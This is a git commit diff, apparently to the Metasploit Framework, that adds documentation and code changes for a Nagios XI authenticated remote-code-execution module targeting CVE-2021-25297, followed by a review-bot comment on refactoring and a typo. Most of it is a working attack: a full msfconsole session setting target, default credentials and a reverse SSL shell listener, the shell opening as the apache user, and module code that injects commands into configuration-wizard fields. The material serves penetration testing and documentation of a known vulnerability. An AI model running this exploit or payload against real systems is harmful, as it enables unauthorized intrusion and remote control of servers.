Add example for version 5.5.6 with CVE-2021-25297
parent
489ab24876
commit
52fa2e5be6
@ -369,3 +369,83 @@ meterpreter > pwd
|
|||
/usr/local/nagiosxi/html/config
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
|
||||
RHOSTS => 192.168.104.18
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
SSL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
|
||||
LHOST => 192.168.104.2
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
|
||||
LPORT => 8443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
|
||||
g the license agreement.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
|
||||
loit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
|
||||
achine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
|
||||
LPORT 8443 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.104.2:8443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.5.6.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
|
|
@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
datastore['FINISH_INSTALL']
|
||||
end
|
||||
|
||||
# Returns a status code an a error message on failure.
|
||||
# On success returns the status code and an array so we
|
||||
# can update the login_result and res_array variables appropriately.
|
||||
def handle_unsigned_license(res_array, username, password, finish_install)
|
||||
auth_cookies, nsp = res_array
|
||||
sign_license_result = sign_license_agreement(auth_cookies, nsp)
|
||||
|
@ -128,12 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
|
||||
end
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
|
||||
end
|
||||
|
||||
print_good('Successfully authenticated to Nagios XI.')
|
||||
|
@ -212,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
|
||||
# changes from address to ip_address
|
||||
if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
|
||||
if @version <= Rex::Version.new('5.5.7')
|
||||
address_param = 'address'
|
||||
else
|
||||
address_param = 'ip_address'
|
||||
|
@ -223,10 +224,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'windowswmi',
|
||||
'ip_address' => Rex::Text.rand_text_alpha(7..15),
|
||||
'domain' => Rex::Text.rand_text_alpha(7..15),
|
||||
'username' => Rex::Text.rand_text_alpha(7..20),
|
||||
'password' => Rex::Text.rand_text_alpha(7..20),
|
||||
'ip_address' => Array.new(4) { rand(256) }.join('.'),
|
||||
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'username' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'password' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
|
||||
})
|
||||
# CVE-2021-25297 affects the switch configuration wizard.
|
||||
|
@ -235,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'nextstep' => 3,
|
||||
'wizard' => 'switch',
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'scaninterfaces' => 'on'
|
||||
})
|
||||
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
|
||||
|
|
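Review bot: The hunk at @@ -223,10 +224,10 builds a dotted-quad with `Array.new(4) { rand(256) }.join('.')` for the windowswmi wizard's `ip_address`, and the identical expression already exists on the switch-wizard line `address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};"` in the @@ -235,7 +236,7 hunk, so the two copies should share one private helper rather than drift apart. Adding `def random_ipv4` / `  Array.new(4) { rand(256) }.join('.')` / `end` beside the module's other helpers and calling `random_ipv4` at both sites keeps the generated address format in one place. Both hunks are inside a method whose signature lies outside the diff. Separately, the doc comment on handle_unsigned_license in @@ -89,6 +89,9 reads `# Returns a status code an a error message on failure.`; it should read `# Returns a status code and an error message on failure.`, assuming those comment lines are the three additions in that hunk.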